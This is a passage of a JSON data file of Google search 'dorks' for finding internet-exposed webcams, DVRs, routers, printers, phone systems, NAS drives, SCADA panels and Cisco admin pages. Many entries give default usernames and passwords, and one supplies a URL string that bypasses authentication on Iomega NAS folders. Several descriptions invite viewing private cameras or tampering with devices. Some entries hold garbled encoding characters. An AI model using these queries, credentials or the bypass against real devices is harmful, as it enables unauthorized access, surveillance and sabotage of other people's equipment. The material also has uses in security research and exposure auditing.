manage the camera from a Web browser on any computer [..]"}, {"dork": "inurl:TiVoConnect?Command=QueryServer", "description": "Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms)."}, {"dork": "intitle:\"DVR Web client\"", "description": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc."}, {"dork": "site:.viewnetcam.com -www.viewnetcam.com", "description": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent."}, {"dork": "inurl:\"level/15/exec/-/show\"", "description": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed."}, {"dork": "WebControl intitle:\"AMX NetLinx\"", "description": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet."}, {"dork": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "description": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer."}, {"dork": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "description": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator' is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator."}, {"dork": "inurl:axis-cgi", "description": "Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)"}, {"dork": "intitle:\"ipcop - main\"", "description": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)"}, {"dork": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "description": "smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment)."}, {"dork": "inurl:\"ipp/pdisplay.htm\"", "description": "Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009dbringing the power of the Net to your business environment. This search locates various online printers."}, {"dork": "axis storpoint \"file view\" inurl:/volumes/", "description": "The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF."}, {"dork": "intitle:\"AudioReQuest.web.server\"", "description": "Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!"}, {"dork": "inurl:\":631/printers\" -php -demo", "description": "CUPS provides a portable printing layer for UNIX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (\"IPP\") as the basis for managing print jobs and queues. The Line Printer Daemon (\"LPD\") Server Message Block (\"SMB\"), and AppSocket (a.k.a. JetDirect)."}, {"dork": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "description": "The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization."}, {"dork": "intitle:\"Cayman-DSL.home\"", "description": "Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch."}, {"dork": "Axis Video Manual", "description": "Some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. \nAnyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?): site:com inurl:axis video server manuals\nCan you say default UID and PW?\nWhat's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).\nAnyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy access to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.\nBottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.\nRate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it."}, {"dork": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "description": "Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system."}, {"dork": "filetype:cgi transcoder.cgi", "description": "Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices."}, {"dork": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "description": "This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security."}, {"dork": "allinurl:index.htm?cus?audio", "description": "This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only .."}, {"dork": "inurl:\"8003/Display?what=\"", "description": "Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, and generating reports."}, {"dork": "intitle:\"EverFocus.EDSR.applet\"", "description": "The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs."}, {"dork": "inurl:na_admin", "description": "This searches for the admin pages for a \"Network Appliance\" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db"}, {"dork": "intitle:\"Connection Status\" intext:\"Current login\"", "description": "This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!"}, {"dork": "intitle:\"DEFAULT_CONFIG - HP\"", "description": "High scalable Ethernet switches by HP running in the default configuration"}, {"dork": "intitle:\"supervisioncam protocol\"", "description": "\"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected.\""}, {"dork": "allintitle:Brains, Corp. camera", "description": "mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in."}, {"dork": "intitle:\"Dell Laser Printer\" ews", "description": "Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc.."}, {"dork": "intitle:asterisk.management.portal web-access", "description": "Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a \"canned\" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX."}, {"dork": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "description": "BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses."}, {"dork": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "description": "This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password."}, {"dork": "\"About Winamp Web Interface\" intitle:\"Winamp Web Interface\"", "description": "Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface."}, {"dork": "intitle:\"NeroNET - burning online\"", "description": "NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual."}, {"dork": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "description": "Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs."}, {"dork": "inurl:\"port_255\" -htm", "description": "Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177"}, {"dork": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "description": "Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low."}, {"dork": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time & Any where\" username password", "description": "AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server."}, {"dork": "inurl:start.htm?scrw=", "description": "VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)"}, {"dork": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mob", "description": "Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links, &N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results."}, {"dork": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "description": "This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based."}, {"dork": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously."}, {"dork": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously."}, {"dork": "intitle:\"Veo Observer Web Client\"", "description": "Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append \"LGI_en.htm\" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that."}, {"dork": "intitle:\"Java Applet Page\" inurl:ml", "description": "Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)"}, {"dork": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "description": "DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify."}, {"dork": "intitle:\"V1\" \"welcome to phone settings\" password", "description": "This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321."}, {"dork": "intitle:\"HP ProCurve Switch *\" \"This product requi", "description": "HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details)."}, {"dork": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"", "description": "sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through \"Email , SMS or SNMP Alerts in your Network Management system\" in advance and prevent any disaster."}, {"dork": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "description": "This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results. p.s. This was discovered by jeffball55 and cleaned up by golfo"}, {"dork": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "description": "This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out."}, {"dork": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "description": "Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available."}, {"dork": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "description": "This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people."}, {"dork": "Display Cameras intitle:\"Express6 Live Image\"", "description": "Express6 live video controller.Displays video from \"Netlive Cameras\" found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416Several new cameras found in this search."}, {"dork": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "description": "This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180"}, {"dork": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "description": "Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed."}, {"dork": "inurl:setdo.cgi intext:\"Set DO OK\"", "description": "Dcs-2100 camerasBy removing \"intext:Set DO OK\" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera."}, {"dork": "http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0", "description": "This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch."}, {"dork": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "description": "This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on \"I.T. Watchdogs, Inc. Embedded Web Server\""}, {"dork": "intitle:\"Device Status Summary Page\" -demo", "description": "hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... wooIncludes:Temperature (\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00b0F)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:"}, {"dork": "intitle:\"iGuard Fingerprint Security System\"", "description": "vendor:http://www.iguardus.com/dome information disclosure: employeers list & free camera access"}, {"dork": "intitle:\"SNC-RZ30\" -demo", "description": "This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quite a few of these cameras have not been configured to deny you control. These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results.SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1 SNC-Z20"}, {"dork": "intitle:\"BlueNet Video Viewer\"", "description": "Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. Uses ActiveX."}, {"dork": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "description": "The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now."}, {"dork": "allintitle:\"DVR login\"", "description": "softwell Technology \"Wit-Eye\" DVR.Default user/pass is admin:adminRequires ActiveX"}, {"dork": "\"Welcome to the CyberGuard unit!\"", "description": "\"Welcome to the CyberGuard unit! To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)"}, {"dork": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "description": "\"Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)PS: this software looks very much like Cyberguard."}, {"dork": "intitle:\"Your Network Device\" Status (LAN | WAN)", "description": "Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this \"victim\" ;)"}, {"dork": "intitle:\"Net2Phone Init Page\"", "description": "Net2Phone CommCenter\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is software that allows you to make phone calls and send faxes to anywhere in the world."}, {"dork": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "description": "VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp"}, {"dork": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "description": "This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=evocam&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=\r\n\r\n\r\n\r\nAuthor: Airloom"}, {"dork": "inurl:\":9000\" PacketVideo corporation", "description": "inurl:\":9000\" PacketVideo corporation\nAbout: This provides Twonky Server Media interface. You can find images, music, videos etc.\nSubmitter: Ishaan P"}, {"dork": "allintitle:\"UniMep Station Controller\"", "description": "UniMep is a device for managing fuel station. You can see process of\nfueling cars and you can make some changes in the setting.\nThe default username/password is admin/setup. Author: WBR rigan"}, {"dork": "inurl:/cgi-bin/makecgi-pro", "description": "Brings up listings for Iomgea NAS devices.\nPassword protected folders are susceptible to authentication bypass by\nadding the following to the url (after /cgi-bin/make-cgi-pro):\n?page_value=page_files&tab_value=%20&task_value=task_gotoPath¶m1_value=(foldername)\nCommon folders are music, movies, photos & public. Author: Matt Jones"}, {"dork": "intitle:SpectraIV-IP", "description": "Google dork for pelco SpectraIV-IP Dome Series cameras\nDefault username/password \"admin/admin\". Author: GhOsT-PR"}, {"dork": "inurl:Settings.aspx intitle:Beyond TV", "description": "Beyond TV gives you the capability to turn your PC into a high quality,\ndigital video recorder (DVR). Most people use it for cable TV so that\nthey don't have to spend rent money on a low end quality hardware DVR\nfrom their cable company. It's default config has no password or\nusername enabled. Very bad for people who connect their PCs directly to\ntheir modems. I have Beyond TV and I was curious on how secure it is."}, {"dork": "'apc info' 'apc.php?SCOPE='", "description": "This dork will locate Unsecured PHP APC Installations.\nWith regards,\nShubham Mittal\n(Hack Planet Technologies)\nhttp://hackplanet.in"}, {"dork": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "description": "Pyxis Mobile Test Page\nintitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\""}, {"dork": "inurl:32400/web/index.html", "description": "Submitting this for the GHDB. These are web accessible Plex Media Servers\nwhere you can watch/listen to other people's media collections.\nFYI"}, {"dork": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "description": "This dork finds web interfaces of various routers using custom firmware DD-WRT.\n Default login: root\n Default password: admin\n greetings, uA"}, {"dork": "inurl:\"/level/13|14|15/exec/\"", "description": "inurl:\"/level/13|14|15/exec/\"\nCisco IOS HTTP Auth Vulnerability .. Command before exec/ . Example\nexec/-/?"}, {"dork": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "description": "Hello,\nEnumerate Solarwinds Orion network monitoring portals. In some cases, the\nportal can be accessed without authenticating.\n-Sean"}, {"dork": "inurl:/Portal/Portal.mwsl?PriNav=FileBrowser", "description": "inurl:/Portal/Portal.mwsl?PriNav=FileBrowser\r\n\r\nAccess into simatic step 7 plc software systems \r\n\r\nby dekingofcyber...."}, {"dork": "intitle:\"Weather Wing WS-2\"", "description": "#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.\n#Category: Various Online Divices\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"NetBotz Network Monitoring Appliance\"", "description": "#Summary:Various Online Divices\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "description": "#Summary: Cheeta Technologies Transponder Configuration Portal (*\nhttp://www.cheetahtech.com).*\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "description": "#Summary: Several printers that use \"Web Image Monitor\" control panel (\nhttp://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used default\nby Ricoh, Lanier and others.\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"SPA504G Configuration\"", "description": "Dork : intitle:\"SPA504G Configuration\"\nResult : Gives access to Cisco SPA504G Configuration Utility for IP phones\nScreenshot Google Dork\nDork found by :\nredN00ws"}, {"dork": "inurl:\"/cgi-mod/index.cgi\"", "description": "Returns login pages for various Barracuda Networks branded hardware spam\nfilters and mail archivers.\n4N6 Security"}, {"dork": "intitle:\"RouterOS router configuration page\"", "description": "Returns login portals for Microtik routers running RouterOS version 5\nand up.\n4N6 Security"}, {"dork": "inurl:\"/webcm?getpage=\"", "description": "Returns various Actiontec (and often Qwest) branded routers' login pages.\n4N6 Security"}, {"dork": "intitle:\"Web Client for EDVS\"", "description": "Yet another DVR system. Probably requires Java to display.\n4N6 Security"}, {"dork": "intitle:\"IPCam Client\"", "description": "Foscam IPCam\nBy default these cameras attach to the myfoscam.org DDNS. So you could add\nsite:myfoscam.org. On the otherhand if you're hunting for DDNS servers, you\ncould negate that site and examine the other results.\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "intitle:\"RT at a glance\" intext:\"quick search\"", "description": "RT Request Tracker Ticket Database\nhttp://www.bestpractical.com/rt/\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "filetype:jnlp", "description": "Java Web Start (Java Network Launch Protocol)\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:\"/public.php?service=files\"", "description": "Search for shared files from ownCloud\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "inurl:dfshealth.jsp", "description": "dork:inurl:dfshealth.jsp\ndirect get the access of hadoop cluster with root user\n-- \nSimmant Yadav"}, {"dork": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "description": "Hits: 4,250 results\nThis dork finds PacketCable 1.0 Touchstone Telephony Modems that are online\nwherein you see its event logs, system information, interface parameters,\nmac addresses, etc.\n*Jay Turla a.k.a shipcode*"}, {"dork": "inurl:dyn_sensors.htm", "description": "MiniGoose II environmental temprature monitoring panel \nAuthor:@cns0x"}, {"dork": "inurl:.cgi-bin/webproc", "description": "inurl:.cgi-bin/webproc\nLogin for various type of router.\nBy Rootkit."}, {"dork": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "description": "## Open Seagate NAS drives\ninurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive\nJason Coleman - CISSP, GWAPT\nAnalyst, Security Management Program | Verizon Enterprise Solutions"}, {"dork": "inurl:\"/certsrv\" intext:\"Select a task\"", "description": "Microsoft Certificate Request Webpage.\nAuthor: Felipe Molina (@felmoltor)"}, {"dork": "allinurl:awstats.pl ext:pl", "description": "A lot of Panels with Statics Advanced. Enjoy.\nBy Rootkit."}, {"dork": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "description": "Search the Sarg monitoring graphs of Web Proxy SQUID3\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar"}, {"dork": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "description": "# Exploit Title: Unprotected HP Laserjets\n# Google Dork: intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm\n# Date: 15/08/2015\n# Exploit Author: Anonymous\nChange default password or add your own password as the printers come without a password which allows others to mess with settings and print various things."}, {"dork": "intitle:\"IPCam\" inurl:monitor2.htm", "description": "EasyN IP webcam WebUI.\nCategory: Various Online devices\n- Fitzl Csaba"}, {"dork": "intitle:\"WebService Web Service\" ext:asmx", "description": "Servers with \"Web Service commands activated\".\nDork by Rootkit Pentester."}, {"dork": "inurl:printer/main.html", "description": "This Dork reveals a lot of Printers Panels.\nEnjoy with moderation xD.\nThis Dork is discovered by Rootkit Pentester."}, {"dork": "intitle:Global Traffic Statistics \"Ntop\"", "description": "Google dork Description: View Global Traffic Statistics\nGoogle search: intitle:Global Traffic Statistics \"Ntop\"\nSubmited: 2015-10-3\nNote:\nNtop shows the current network usage. It displays a list of hosts that \nare currently using the network and reports information concerning the \nIP (Internet Protocol) traffic generated by each host."}, {"dork": "inurl:axis.cgi ext:cgi", "description": "Dork for all axis cams. Enjoy with them!.\nThese Dork is Discovered by Rootkit Pentester."}, {"dork": "inurl:webvisu.htm ext:htm", "description": "Google dork Description: View SCADA web visual interface\nGoogle search: inurl:webvisu.htm ext:htm\nSubmited: 2015-10-8\nNote:\nSCADA web visual. - Yudha[at]glosmon.com"}, {"dork": "\"Build ref: 26\"", "description": "Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)\nCameras\nGoogle Search: \"Build ref: 26\"\nVendor: PIPS Technology (3M)\nhttp://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technology\nListing of ANPRs/ALPRs cameras.\nJohn Jolly"}, {"dork": "inurl:net/net/airprint.html", "description": "Title: inurl:net/net/airprint.html\nDescription : This dork can access many printers without login.\nBy Sivabalan"}, {"dork": "inurl:/net/net/protocol.html", "description": "Title: inurl:/net/net/protocol.html\nDescription: This dork can access many printers without login \nBy Sivabalan"}, {"dork": "intitle:(build 13064) - Info", "description": "Dork for DD-WRT routers with V24 build number 13064.\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:/tcpipv6.htm", "description": "inurl:/tcpipv6.htm\nDescription: This google dork can access many HP LASER JET printers without login..\nBy Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/", "description": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/\nDescription : This google dork can access many ( LuCI Trunk based wireless system management) \n By Sivabalan( CYBER GENIUS ) ..."}, {"dork": "inurl:/hp/device/supply_status.htm", "description": "inurl:/hp/device/supply_status.htm\nDescription : This google dork can access many HP 